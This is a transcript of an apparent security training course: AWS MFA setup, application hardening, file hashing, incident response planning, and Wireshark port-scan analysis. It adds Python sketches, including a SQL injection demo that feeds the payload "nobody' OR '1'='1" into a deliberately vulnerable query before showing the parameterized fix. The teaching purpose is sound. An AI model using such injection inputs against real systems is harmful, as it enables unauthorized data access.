[Video description begins] The AWS Management Console web page is open. It is
divided into four parts. The first part includes the Services drop-down button. The
second part is AWS services. It contains the Find services search box and the
Recently visited services and All services expandable sections. The All services
expandable section is expanded. It includes the Compute and Machine Learning
sections. The Compute section includes the EC2 and ECR options. The Machine
Learning section includes the Amazon SageMaker and AWS DeepLens options. The
second part is Access resources on the go. The third part is Explore AWS. [Video
description ends]
To start with, you need an account with Amazon Web Services or AWS. I've
already got one, and I've signed in to the administrative console. The next thing I'm
going to do here, in the AWS Management Console, is I'm going to take a look at
any existing users I might have created in the past. Now, I've already got a user
here that has been added to a group. So we're going to go to take a look at it
because we're going to enable MFA, or multi-factor authentication, for that user. So
let's get to it. Let's scroll down, under Security, Identity & Compliance, I'm going
to click IAM, which stands for Identity and Access Management.
[Video description begins] The IAM Management Console web page is displayed.
It is divided into three parts. The first part is the navigation pane. It includes the
Users option. The second part is the content pane. The third part is Feature
Spotlight. [Video description ends]
And over on the left, I'm going to click Users.
[Video description begins] The content pane includes a table and the Add User and
Delete User buttons. The table has the column headers: User name, Groups,
Access key age, Password age, Last activity, and MFA. The User name column
header has the value, jchavez. The Groups column header has the value,
LasVegas_HelpDesk. The Access key age column header has the value, None. The
Password age column header has the value, 34 days. The Last activity column
header has the value, 34 days. The MFA column header has the value, Not
enabled. [Video description ends]
And here we have a user called jchavez, that is a member of the
LasVegas_HelpDesk group, which gives them certain permissions to manage AWS
cloud resources. But for our purpose here, I'm going to click on the username because
we want to enable MFA.
[Video description begins] He clicks the jchavez value in the User name column
header. The Summary page opens. It includes the Permissions and Security
credentials tabs. [Video description ends]
And in the user information, I want to go to the Security credentials tab. We can
see the assigned MFA device says Not assigned.
[Video description begins] The Security credentials tab includes the Sign-in
credentials section. It includes the text, Assigned MFA device Not assigned |
Manage. Manage is a link. [Video description ends]
So I'm going to go ahead and click Manage.
[Video description begins] The Manage MFA device dialog box opens. It includes
the Virtual MFA device radio button and the Continue button. The Virtual MFA
device radio button is selected. [Video description ends]
Now, we could use a physical security key or hardware token, that is, physically some kind of device. But here, we're going to enable a virtual MFA device, which means I've got an authenticator app installed on my smartphone. And if I don't, I'd have to go to the appropriate app store to install it. So I'm going to go ahead and choose
Continue.
[Video description begins] He clicks the Continue button. The Set up virtual MFA
device dialog box opens. It includes the text, 1. Install a compatible app on your
mobile device or computer See a list of compatible applications 2. Use your virtual
MFA app and your device's camera to scan the QR code, 3. Type two consecutive
MFA codes below, and Previous and Assign MFA buttons. The phrase, list of compatible applications, in the text, See a list of compatible applications, is a link. A box
displaying a link, Show QR code, is present below the text, Use your virtual MFA
app and your device's camera to scan the QR code. The MFA code 1 and MFA
code 2 text boxes are given below the text, 3. Type two consecutive MFA codes
below. The Assign MFA button is disabled. [Video description ends]
Now at this point, it tells me to install the compatible app on my mobile device or
computer. And if I go to the list of compatible apps, it'll tell me what is supported.
[Video description begins] He clicks the list of compatible applications link. The
Multi-Factor Authentication web page opens. [Video description ends]
So if I go down, I can see for my virtual MFA device, I can determine which item I
can install on a particular type of platform. So for example, for Android, which I've
got, I can install the Google Authenticator. Anyways, that is fine.
[Video description begins] He closes the Multi-Factor Authentication web
page. [Video description ends]
But the next thing we have to do is use the virtual MFA app and the device's camera to scan the QR code that will show up here. I'm going to click here to show that QR code.
[Video description begins] He clicks the Show QR code link. The QR code is
displayed in the box. [Video description ends]
So I'm going to pause for a moment here. I'm going to install the Google
Authenticator on my Android and I'm going to scan this QR code. Once you've
scanned the QR code with your authenticator app, in my case Google
Authenticator, which is what I've chosen. The next thing to do is to put in the code
that it's going to be displaying. So the app on your smartphone will be generating a
code that changes periodically. So you have a certain window of time to enter that
in before you'll be able to authenticate.
[Video description begins] He types 119558 in the MFA code 1 text box. [Video
description ends]
So for example, I'll pop in the code that is being displayed on my device, and then
I'll wait for the next code to show up. It wants two codes before we can complete
this procedure.
[Video description begins] He types 293978 in the MFA code 2 text box. The
Assign MFA button gets enabled. [Video description ends]
And then after that, I can click Assign MFA.
[Video description begins] The Set up virtual MFA device message box opens. It
displays the message, You have successfully assigned virtual MFA This virtual
MFA will be required during sign-in. It also displays the Close button. [Video
description ends]
And it now tells me that I have successfully assigned the virtual MFA for this
account.
[Video description begins] He clicks the Close button, and the message box closes.
The Summary page includes the text, User ARN
arn:aws:iam::611279832722:user/jchavez. The Security credentials tab includes
the text, Summary Console sign-in link: https://611279832722.
signin.aws.amazon.com/console. [Video description ends]
And it says that this virtual MFA, multi-factor authentication, will be required
during sign-in, in this case, for this particular user, which is jchavez, as we can see
listed all the way up here.
[Video description begins] He highlights
arn:aws:iam::611279832722:user/jchavez in the text, User ARN
arn:aws:iam::611279832722:user/jchavez. [Video description ends]
Notice here in Amazon Web Services while we're under the Security credentials
tab, that we've got the console sign-in link for this particular user. Why don't we
fire that up and try to log in as that user and see what happens?
[Video description begins] He opens the Amazon Web Services Sign-In web page. It
includes the Account ID or alias, IAM user name, and Password text boxes and the
Sign In button. The Account ID or alias text box has the value, 611279832722. The
IAM user name and Password text boxes are blank. [Video description ends]
So when I pop in that URL, it knows the Account ID. So I have to enter the IAM
user name for Amazon Web Services along with the password, I still need to know
that. But then when I click Sign In, it should require me to enter something else.
[Video description begins] He types jchavez in the IAM user name text box and
password in the Password text box. [Video description ends]
Because that is multi-factor authentication and that something else would only be
available if I have my smartphone where I've configured that authentication. So it's
waiting for me to enter the MFA Code.
[Video description begins] He clicks the Sign In button. The MFA Code text box,
the Submit button, and the Cancel link appear. [Video description ends]
So all I would do on my smartphone is fire up, in my case, my Google
Authenticator app. And for a certain period of time, a code will be displayed before
it changes to something else. So I'm going to go ahead and enter in the code that is
displayed currently to see if I can authenticate.
[Video description begins] He types 351264 in the MFA Code text box and clicks
the Submit button. The error, Your authentication information is incorrect. Please
try again, appears above the Account ID or alias, IAM user name, and Password
text boxes and the Sign In button. [Video description ends]
Sometimes if you're not quick enough with the code, it might expire before it'll let
you in. So let's go ahead and try this again.
[Video description begins] He types password in the Password text box and clicks
the Sign In button. The MFA Code text box, the Submit button, and the Cancel link
appear. [Video description ends]
I just have to wait for the code to update; it's just about expired on my
smartphone app. Okay, let's try this again.
[Video description begins] He types 139381 in the MFA Code text box and clicks
the Submit button. He gets logged in to AWS Management Console. The user name,
jchavez @ 6112-7983-2722, is present in the web page. He hovers over this user
name. [Video description ends]
This time I am successfully authenticated as user jchavez with multi-factor
authentication.
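To give a sense of what the authenticator app is doing behind the scenes, here is a minimal Python sketch of the time-based one-time password (TOTP) algorithm that virtual MFA devices generally implement, assuming a shared base32 secret like the one encoded in the QR code; the secret shown is a made-up placeholder, not a real AWS value.

import base64, hashlib, hmac, struct, time

def totp(base32_secret: str, digits: int = 6, period: int = 30) -> str:
    # Decode the shared secret that the authenticator app scanned from the QR code
    key = base64.b32decode(base32_secret.upper())
    # The moving factor is the number of 30-second periods since the Unix epoch
    counter = int(time.time()) // period
    msg = struct.pack(">Q", counter)
    # HMAC-SHA1 of the counter, then dynamic truncation down to a short numeric code
    digest = hmac.new(key, msg, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)

print(totp("JBSWY3DPEHPK3PXP"))  # hypothetical secret, for illustration only

Because the phone and the AWS side both hold the same secret and clock, both can compute the same short-lived code, which is why typing two consecutive codes proves that the device really holds the secret.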
Securing Applications
[Video description begins] Topic title: Securing Applications. The presenter is Dan
Lachance. [Video description ends]
Securing applications is an important aspect of cybersecurity. Whether we're
talking about applications people use personally or, of course, those also used for
business productivity.
[Video description begins] Securing Applications [Video description ends]
The first consideration within an organization is whether off-the-shelf applications
are being used, straight from an app store, for example, in a mobile device
environment. In which case, we want to make sure that digital signatures are
trusted. Most apps in common app stores are digitally signed by the organizations
that build them. And this digital signature can't be easily forged, and so it
establishes a chain of trust. We trust that the author of this application has built an
application that is trustworthy. We've got a digital signature. At the same time we
can also have an organizational list of only approved apps that can be installed
from specific app stores.
In some cases, organizations can even build their own custom organizational app
stores and make apps available for business productivity that they control in that
specific app store. Organizations can also commission the creation, or they can
build their own custom built applications. We also have to consider where apps are
being used in the sense of geofencing. If we've got a sensitive app that really should
only be used within the perimeter of a facility, or a campus, well then, we can
configure geofencing so that the app only works within that location. Securing
applications also means dealing with access control. In other words, dealing with
an identity store where user accounts would exist. Or in some cases we also have
devices that authenticate to an application even without user intervention.
Or software can communicate with other pieces of software automatically, again,
with no user intervention. But either way, it's access control, it's a unique identity,
and we need to make sure that strong authentication is being used beyond just
username and password type of authentication. Access control also deals with
granting a specific level of permission to a resource for an entity such as a user or a
group. And so we want to make sure that we adhere to the principle of least privilege,
where we're only applying the permissions that are required to perform a task, and
nothing more. We should also consider whether we want to audit failed access
attempts. There is this notion also of application wrapping, whereby we can add
user authentication to a specific application.
You might have one app that is highly sensitive that requires further additional
authentication beyond what the user might already use, to sign into their laptop or
their desktop or their phone. And so application wrapping lets us add additional
authentication to an app, even if the app doesn't support it internally, so we can add
that additional level of security. Logging is always an important part of security, and
certainly that is the case when it comes to tracking application activity. We should
always make sure that, first of all logging is enabled for app usage.
And that we store additional copies of logs on a centralized logging host on a
protected network. And that can even be automated when it comes to configuring
devices to forward specific log events elsewhere. Securing an application also
means changing default settings. Such as where the app installed itself in terms of
the file system hierarchy. Changing any account names or passwords specifically
associated with the app. So we never stick with defaults when it comes to
hardening an environment, that also applies to securing applications. If your
organization is building a custom application, then the development team will
adhere to the software development life cycle.
[Video description begins] Software Development Life Cycle [Video description
ends]
Of course, if you use off-the-shelf software, commercial software, those
programming teams also adhered to this model. Where we have a number of
different phases such as the requirements phase: what do we need this software to
do. Then, we can analyze whether there is already a solution out there or whether
we're going to do a custom built solution. Then we start designing the solution,
followed by actual coding by programmers.
Which is then followed by testing, make sure that the code is secure, and that the
application is functional and meets requirements. Finally, we can then deploy the
solution. Now, why are we talking about this? We're talking about securing
applications, and the point here is that through each and every one of these SDLC
phases, security must be thought of. We don't want to get to the point where we are
testing and then realize we should think about security. Or get to the point where
we're actually writing code, and then start thinking about security. Security needs to
be a part of every software development life cycle phase. For web applications, we
can use a web application firewall, otherwise called a WAF, W-A-F.
[Video description begins] Securing Applications [Video description ends]
The purpose of the web application firewall is to check for web application types of
attacks, such as directory traversal attacks, SQL injection attacks, cross-site scripting attacks, and many, many more. So it's a specialized application-level
firewall for web-based applications. Another option is to consider using load
balancing or a reverse proxying solution, where a client request for an application would hit a public interface, for instance, of a load balancer, which in turn would determine which of the back-end servers actually hosting the app is the least busy, and forward the request to it. In this way, we're hiding the true server identities of our application servers.
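As a quick illustration of one attack class that a WAF watches for, SQL injection, here is a minimal Python sketch contrasting a string-built query with a parameterized one; the table, column, and user names are hypothetical and not taken from the demo environment.

import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('jchavez', 'helpdesk')")

user_input = "nobody' OR '1'='1"  # attacker-supplied value

# Vulnerable: the input is concatenated directly into the SQL statement
unsafe = "SELECT role FROM users WHERE username = '" + user_input + "'"
print(conn.execute(unsafe).fetchall())  # returns a row even though no such user exists

# Safer: a parameterized query treats the input strictly as data
safe = "SELECT role FROM users WHERE username = ?"
print(conn.execute(safe, (user_input,)).fetchall())  # returns no rows

A WAF tries to catch injection patterns like this at the network edge, but fixing the query itself removes the underlying vulnerability.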
Encryption is always a good idea when it comes to securing applications. At the network level, we can think of using HTTPS. Now, HTTPS means that we've got access to a web application through a URL, and that the server needs a PKI certificate. And ideally, the server will be configured to use not SSL, not even SSL version 3, but rather TLS. And this way, we have a secure way of
exchanging keys and information during that encrypted session. We can also use
virtual private networks or VPNs to allow people to work remotely. They establish
an encrypted tunnel with an endpoint, for example, a VPN concentrator on the
premises or the company location, and everything between the user device and that
VPN concentrator is encrypted. Also we might use IPsec. IPsec allows us to control
very specifically which type of IP traffic is encrypted, even all of it.
And this happens regardless of application, it's not like we have to configure a PKI
certificate for a specific web app on a server like we would with HTTPS. So IPsec
is much more broad in its potential application or usage. Of course, it's always
important to secure data at rest with encryption, such as in the file system,
encrypting files or folders, or disk volumes. Encrypting databases or replicas of
databases that we might have out there. The OWASP top 10 is very important when
it comes to securing applications. You might be wondering why? Why is it so
important? OWASP stands for the Open Web Application Security Project. And if
you've never heard of this or taken it into account in the past, it deals with different types of web application security vulnerabilities that are then open to attacks like injection attacks, authentication that might be broken in an app, or security misconfigurations. And every year there is an
OWASP top 10, in terms of top 10 vulnerabilities, that gets published. So OWASP
is really focused on web app security, and also provides tools for securing and
testing web applications. So OWASP is very important when it comes to having a
discussion about securing specifically web applications. Developers can also use
the OWASP ESAPI. This is the Enterprise Security API, which allows
developers to use secure coding functions that are already built and trusted.
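To tie the TLS point above to something you can verify, here is a minimal Python sketch that opens an HTTPS connection and reports which protocol version was actually negotiated; the host name is just an example to swap for your own server.

import socket
import ssl

def negotiated_tls_version(host: str, port: int = 443) -> str:
    # The default context validates the server's PKI certificate and host name
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls_sock:
            return tls_sock.version()  # e.g., 'TLSv1.2' or 'TLSv1.3'

print(negotiated_tls_version("www.example.com"))

If the result comes back as an old SSL or early TLS version, that server is a candidate for hardening.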
Implement File Hashing
[Video description begins] Topic title: Implement File Hashing. The presenter is
Dan Lachance. [Video description ends]
In this demonstration, I'll implement file hashing using Microsoft Windows
PowerShell. File hashing allows us to generate a unique value based on the
contents of a file. And we can compare that in the future when we run file hashing
again to see if those two unique hashes or values are the same.
Because if they're not, something has changed in the file. And so this is used often
by forensic investigators that gather IT digital evidence to ensure that data hasn't
been tampered with. And it adheres to the chain of custody.
[Video description begins] The Windows Powershell window is open. It displays
the prompt, PS D:\work\Projects_Sample_Files>. [Video description ends]
So the first thing I'm going to do here on my machine is point out that I've
navigated to drive D, where I've got some folders with some sample files. If I do a
dir, we've got three project files, they're just text files.
[Video description begins] He executes the command: dir. The output displays a
table with four column headers: Mode, LastWriteTime, Length, and Name. The
Mode column header has the value, -a----, for all the rows. The LastWriteTime
column header has the value, 11/08/16 12:32 PM, for all the rows. The Length
column header has the values, 456, 912, and 26112. The Name column header has
the values, Project_A.txt, Project_B.txt, and Project_C.txt. The prompt does not
change. [Video description ends]
What I'm going to do is use the get-filehash PowerShell cmdlet. And I'm
going to specify *, because I want to get a filehash or generate a hash for each and
every file within this current subdirectory. When I press Enter, we can see the file
hashes that are applied to each of the files.
[Video description begins] He executes the command: get-filehash *. The output
displays a table with three column headers: Algorithm, Hash, and Path. The
Algorithm column has the values, SHA256, for all the rows. The hash column
header has the values,
62BC9ADF78D284822208F008ED68093059FF2AD61BE9332EC21AFB77A6480
CA7,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286E
F2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A9
5AAF. The Path column header has the values, D:\work\Projects_Sample_Files,
for all the rows. The prompt does not change. [Video description ends]
Now, what I'm going to do is make a change to the Project_A.txt file. I'll just use
Notepad to do that. Then we're going to come back and run get-filehash again to
see if any of the hashes are different. So I'm just going to run notepad here. And I'm
going to run it against project_a.txt.
[Video description begins] He executes the command: notepad project_a.txt. The
Project_A.txt file opens. It displays the text, Sample text. The prompt does not
change. [Video description ends]
And I'm just going to go ahead and make a change to the file. So maybe I'll just add
Changed in the first line, and I will close and save the file. So the Project_A.txt file has now been changed, we can agree on that. So I'm going to use my up arrow key
to go back to my command history. And once again, I'm going to run get-filehash
against all files in the current directory.
[Video description begins] He executes the command: get-filehash *, again. The
output displays a table with three column headers: Algorithm, Hash, and Path. The
Algorithm column has the values, SHA256, for all the rows. The hash column
header has the values,
89814AB289AE01A11FC7CEFD1574E469B0DF0DB4C64DD8ED84A365F5AFB
D4F28,
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286E
F2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A9
5AAF. The Path column header has the values, D:\work\Projects_Sample_Files,
for all the rows. The prompt does not change. [Video description ends]
Notice for the first entry, Project_A, you can't really see the file name, it's off the
screen. But notice that the hash originally began with 62BC9.
[Video description begins] He highlights 62BC9 of the value,
62BC9ADF78D284822208F008ED68093059FF2AD61BE9332EC21AFB77A6480
CA7, in the Hash column of the table displayed in the output of the previously
executed command: get-filehash *. [Video description ends]
And it no longer begins with that, why? Because the file contents have changed, it's
not the same file anymore. But notice that the other file hashes respectively for the
Project_B and Project_C files have remained the same.
[Video description begins] He highlights 89814 of the value,
89814AB289AE01A11FC7CEFD1574E469B0DF0DB4C64DD8ED84A365F5AFB
D4F28, in the Hash column of the table displayed in the output of the command:
get-filehash *, which is executed again. [Video description ends]
And the reason for that is because they have not been modified.
[Video description begins] He highlights the values:
3CE6684FB884479C530D7234C561C31ABD30FAD1AAD9E072EB1DF907286E
F2F1, and
9DAA77C982FDC73C79C5E55670F0DF88517B3D33178F4FFA5C47616CD6A9
5AAF, in the table displayed in the output. [Video description ends]
So file hashing can definitely be useful if we want to detect whether something has
been tampered with or changed since the original hash was generated.
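The same integrity check can be scripted outside of PowerShell. Here is a minimal Python sketch using hashlib that records SHA-256 hashes for a set of files and later flags any file whose hash no longer matches; the file names mirror the demo but are otherwise just placeholders.

import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    # Hash the file in chunks so large files don't need to fit in memory
    digest = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

files = [Path("Project_A.txt"), Path("Project_B.txt"), Path("Project_C.txt")]
baseline = {p.name: sha256_of(p) for p in files}  # hashes taken before any changes

# ... later, after the files may have been modified ...
for p in files:
    status = "unchanged" if sha256_of(p) == baseline[p.name] else "MODIFIED"
    print(f"{p.name}: {status}")

Only a file whose contents changed, like Project_A.txt in the demo, produces a different digest.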
Incident Response Planning
[Video description begins] Topic title: Incident Response Planning. The presenter
is Dan Lachance. [Video description ends]
We've all experienced at some point what it's like to be ill-prepared for a situation;
it's not a good feeling. And so this is what incident response planning is all about,
planning ahead of time.
[Video description begins] Incident Response Planning [Video description ends]
So it's proactive planning for IT security incidents, in terms of what will our
response be when these negative things happen. Now, these occurrences could be
network outages, could be host downtime, perhaps due to hardware failures or a
malicious user compromise of that host. It could be a malware outbreak, could be
an incident related to cybercrime, or sensitive data loss. Either way, we want to
make sure that we've planned for all of these items ahead of time. Incident response plans, and you can have more than one of these for different aspects of systems and data within the organization, often stem from a business impact analysis that was conducted previously, where we determined what the negative consequences are of threats being realized against assets. The recovery time objective or the RTO is an important
factor to consider when it comes to incident response planning. This is set by the
organization and normally it's measured in minutes or hours and it relates to a
specific system. We're talking about the maximum amount of tolerable downtime.
So for example, if server 1 is a crucial server that is used to generate revenue or
something along those lines.
Perhaps we've determined that the RTO for server 1 can be no more than 2 hours,
otherwise it has unacceptable negative consequences against the organization. The
other factor to consider is the recovery point objective, the RPO. This one deals
with the maximum amount of tolerable data loss. So for example, if we determine
that the company can afford to lose up to a maximum of 24 hours worth of a
specific type of data, then that would be the RPO. And that would dictate then, that
we have to take backups of data at least once every 24 hours. The incident response
team is a collection of people that should know what their roles and responsibilities
are when incidents occur such as, who are the first responders?
And who do we escalate to, if we have an incident that occurs and it falls outside
of our skill set or our legal ability to do something about it. Who do we escalate to?
This needs to be known ahead of time and not during the confusion of an incident
actually in the midst of occurring. Well, how are we going to make that work? It's
actually very, very simple. We need to put aside some time to conduct periodic
drills related to negative incidents occurring, so that we can gauge the effectiveness of the incident response plan and the people, who ideally will know their roles. There should be a periodic review related to the results of those
periodic drills. Maybe there needs to be more training provided, and maybe more
frequent drills, to make sure that people know exactly how to respond when
negative incidents occur. Now, let's look at how an incident response plan gets created.
[Video description begins] Creating an Incident Response Plan [Video description
ends]
And remember, this is just specific to a business process, or an IT system
supporting a business process or a subset of data. So you're going to have a lot of
these incident response plans. The first thing you do when you create it, is identify
the critical system or data that the response plan pertains to. Then, identify threat
likelihood against that asset. Identify single points of failure which might be as
simple as having a single Internet connection when we rely on data stored in the
public cloud. We then need to assemble the incident response team, and then
create the plan.
[Video description begins] Incident Response Planning [Video description ends]
Now, the incident response plans will contain procedures, specifics for how to recover from a negative incident, such as system recovery steps or data restoration procedures. They might also specify which tools should be used, such as disk imaging tools or alternative boot mechanisms, which might be used to remove malware infections that can't be removed when the machine is booted normally. Tools could also include things like contact lists that incident
responders would use when they need to escalate.
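Since RTO and RPO were defined above, here is a small Python sketch showing how those targets translate into simple checks against an outage and a backup schedule; the timestamps and targets are made-up values for illustration only.

from datetime import datetime, timedelta

# Targets set by the organization (illustrative values)
rto = timedelta(hours=2)   # maximum tolerable downtime for this system
rpo = timedelta(hours=24)  # maximum tolerable data loss

# Observed values during a hypothetical incident
outage_started = datetime(2019, 1, 8, 9, 0)
service_restored = datetime(2019, 1, 8, 10, 30)
last_good_backup = datetime(2019, 1, 7, 22, 0)

downtime = service_restored - outage_started
data_loss_window = outage_started - last_good_backup

print(f"Downtime of {downtime} within RTO: {downtime <= rto}")
print(f"Data loss window of {data_loss_window} within RPO: {data_loss_window <= rpo}")

The RPO check is also why the plan dictates a minimum backup frequency: backups have to occur at least once per RPO window.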
Examine Network Traffic for Security Incidents
[Video description begins] Topic title: Examine Network Traffic for Security
Incidents. The presenter is Dan Lachance. [Video description ends]
In this demonstration, I'll examine network traffic, looking for security incidents.
That can kind of feel like looking for a needle in a haystack if you're doing it
manually. And in this example, we will do it manually. We're going to use the
Wireshark free packet capturing tool to examine some packet captures.
But certainly, there are appliances, whether they're virtual machines or physical
hardware devices, that you can acquire, that will do a rigorous, detailed network
analysis looking for anomalies. Often though, you're going to have to feed it what
is normal on your network, a security baseline, before it can determine what is
suspicious. So here, I've got a packet capture taken previously.
[Video description begins] The Wi-Fi window is open. It is divided into six parts.
The first part is the menu bar. The second part is the toolbar. The third part
includes the Apply a display filter ... <Ctrl-/> search box. The fourth part contains
a table with the column headers: No., Time, Source, Destination, Protocol, Length,
and Info. The No. column header includes the values: 1196 and 1197. The Time
column header includes the values: 9.557259 and 9.557402. The Source column
header includes the values: 1.1.1.1 and 192.168.0.20. The Destination column
header includes the value: 192.168.0.9. The Protocol column header includes the
value: TCP. The Length column header includes the value: 58. The Info column
header includes the value: 38283 -> 80 [SYN] Seq=0 Win=1024 Len=0
MSS=1460. The fifth part includes the statement: Transmission Control Protocol,
Src Port: 38283, Dst Port: 80, Seq: 0, Len: 0. The sixth part includes 0000 9a de
d0 a9 d9 39 18 56 80 c3 68 ba 08 00 45 00 .....9.V ..h...E. [Video description ends]
And this is something you might do periodically, kind of like a random spot check.
Just start packet captures on networks where you're allowed to do that, save the
packet capture files for later analysis. You might simply go through them out of
interest because it is very interesting. But at the same time, you might also look for
things that perhaps shouldn't be on the network, protocols that shouldn't be in use.
Or maybe rogue hosts that were not there and now are showing up. So here in
Wireshark, as I manually peruse through this packet capture, I might come across
things that look suspicious, such as IP addresses that don't normally fit the profile
of what is on our network.
[Video description begins] He scrolls through the table. [Video description ends]
For example, here I've got a source IP address of 1.1.1.1, where my subnet is
192.168.0.
[Video description begins] He points to the 192.168.0.20 value in the Source
column header. [Video description ends]
Now, that is not to say we shouldn't have any traffic outside of our subnet. Perhaps
the subnet does allow traffic from other locations. However, the other thing to
watch out for is to filter when you find something that you might think is
suspicious. So for example, maybe here, a filter for 1.1.1.1.
[Video description begins] He types 1.1.1.1 in the Apply a display filter ... <Ctrl-/>
search box. [Video description ends]
Now, notice that when I type that in and press Enter, I have a red bar, nothing
happens. Well, that is because I have to tie that value to a specific attribute. So for
example, ip.addr equals 1.1.1.1.
[Video description begins] He alters the 1.1.1.1 value in the Apply a display filter
... <Ctrl-/> search box to ip.addr==1.1.1.1. The No. column header includes the
value: 1142. The Time column header includes the value: 9.332956. The Source
column header includes the value: 1.1.1.1. The Destination column header includes
the value: 192.168.0.5. The Protocol column header includes the value: TCP. The
Length column header includes the value: 58. The Info column header includes the
value: 38282 -> 80 [SYN] Seq=0 Win=1024 Len=0 MSS=1460. The fifth part
includes the expandable section: Ethernet II, Src: IntelCor_c3:68:ba
(18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e (34:64:a9:67:13:0e). The sixth part
includes 0000 34 64 a9 67 13 0e 18 56 80 c3 68 ba 08 00 45 00 4d.g...V
..h...E.. [Video description ends]
So Wireshark has its own little syntax. Now we can see that we've filtered out the
list and we're only seeing 1.1.1.1.
[Video description begins] He highlights the 1.1.1.1 value in the Source column
header. The fifth part includes the expandable sections: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e
(34:64:a9:67:13:0e), Internet Protocol Version 4, Src: 1.1.1.1, Dst: 192.168.0.5,
and Transmission Control Protocol, Src Port: 38282, Dst Port: 80, Seq: 0, Len: 0.
The sixth part includes 0000 34 64 a9 67 13 0e 18 56 80 c3 68 ba 08 00 45 00
4d.g...V ..h...E. [Video description ends]
And if we select one of these packets, we can then start to break down the packet
headers here.
[Video description begins] He expands the section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: HewlettP_67:13:0e
(34:64:a9:67:13:0e). It contains the text, Destination: HewlettP_67:13:0e
(34:64:a9:67:13:0e) Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba) and Type:
IPv4 (0x0800). [Video description ends]
Where, in the Ethernet header, we can see the source and destination MAC
addresses, the hardware addresses, the IP header, Internet Protocol.
[Video description begins] He expands the Internet Protocol Version 4, Src:
1.1.1.1, Dst: 192.168.0.5 section. It includes the text: 0100 .... = Version: 4 ....
0101 = Header Length: 20 bytes (5), Flags: 0x0000 Time to live: 51 Protocol: TCP
(6). [Video description ends]
Where we could see things like Time to live, the TTL value which is normally
decremented by one each time the transmission goes through a router, so it doesn't
go around the Internet forever. There are other fields too in the IP header, but here
in the TCP header, we can see the Destination Port here is 80.
[Video description begins] He expands the expandable section, Transmission
Control Protocol, Src Port: 38282, Dst Port: 80, Seq: 0, Len: 0. It includes the text,
Destination Port: 80. [Video description ends]
Now what is suspicious here is from that same address, it looks like it's trying to hit
TCP port 80, okay? It's trying 192.168.0.2. Same with 0.3, trying to get to port 80,
0.5, port 80, okay.
[Video description begins] He points to the values, 192.168.0.2, 192.168.0.3, and
192.168.0.5, in the Destination column header. [Video description ends]
What this is telling us is someone is conducting a port scan or some kind of a
network scan against those hosts for the same port number.
[Video description begins] He selects the value, 192.168.0.7, in the Destination
column header. The fifth part includes the expandable section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: Sonos_13:31:9c
(94:9f:3e:13:31:9c). [Video description ends]
That is not normal in that small period of time to have the same source IP scanning
for the same port number or trying to make a connection to that port number.
Something is going on here. And at the same time, we might take a look at 1.1.1.1
and look at the source MAC address.
[Video description begins] He expands the section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst: Sonos_13:31:9c (94:9f:3e:13:31:9c).
It includes the text, Source: IntelCor_c3:68:ba (18:56:80:c3:68:ba). [Video
description ends]
Now, of course, it's easy to forge or spoof source IP addresses as well as MAC
addresses.
[Video description begins] He points to the text, Source: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
You'll see forged IP addresses more often than forged MAC addresses, but let's just take note of this MAC address, 18:56:80:c3:68:ba. Okay, I'm
going to keep that in mind for a second. Now as I start looking through here and
trying to draw correlations, notice down here that the destination being probed is 192.168.0.13.
[Video description begins] He selects the value, 192.168.0.13, in the Destination
column header. The fifth part includes the expandable section: Ethernet II, Src:
IntelCor_c3:68:ba (18:56:80:c3:68:ba), Dst:
IntelCor_c3:68:ba(18:56:80:c3:68:ba). It includes the text, Destination:
IntelCor_c3:68:ba (18:56:80:c3:68:ba) and Source: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
Notice, its MAC address is the same as the probing machine.
[Video description begins] He highlights the text, Destination: IntelCor_c3:68:ba
(18:56:80:c3:68:ba). [Video description ends]
What is going on here? So what this is telling me is that we've got a network scan,
and that the person conducting the scan is attempting to hide their true identity with
IP address spoofing.
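The same correlation, one source hitting the same port across many destinations, can be automated rather than eyeballed in Wireshark. Here is a minimal Python sketch that assumes the third-party scapy library is installed and that the capture was saved as capture.pcap (a placeholder name); the threshold of 10 targets is arbitrary.

from collections import defaultdict
from scapy.all import rdpcap, IP, TCP  # assumes scapy is installed (pip install scapy)

packets = rdpcap("capture.pcap")  # a previously saved packet capture

# Count the distinct (destination, port) pairs probed with a bare SYN by each source
syn_targets = defaultdict(set)
for pkt in packets:
    if IP in pkt and TCP in pkt and pkt[TCP].flags == "S":
        syn_targets[pkt[IP].src].add((pkt[IP].dst, pkt[TCP].dport))

for src, targets in syn_targets.items():
    if len(targets) > 10:  # arbitrary threshold for this sketch
        print(f"Possible scan from {src}: {len(targets)} host/port combinations probed")

Dedicated intrusion detection appliances apply this kind of logic continuously, tuned against a baseline of what is normal on your network.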
Exercise: Auditing and Incident Response
[Video description begins] Topic title: Exercise: Auditing and Incident Response.
The presenter is Dan Lachance. [Video description ends]
In this exercise, the first thing you'll start with is to list three security auditing best
practices. After that, you will distinguish between vulnerability assessments and
penetration testing, because those are not the same things. Next, you'll explain how
multi-factor authentication can enhance security. And finally, you'll list the steps
involved in creating an incident response plan. Now is a good time to pause the
video, and to think about each of these four bulleted items, and then afterwards you
can come back to view the solutions.
[Video description begins] Solution. Security Auditing Best Practices. [Video
description ends]
There are many security auditing best practices including the use of unique user
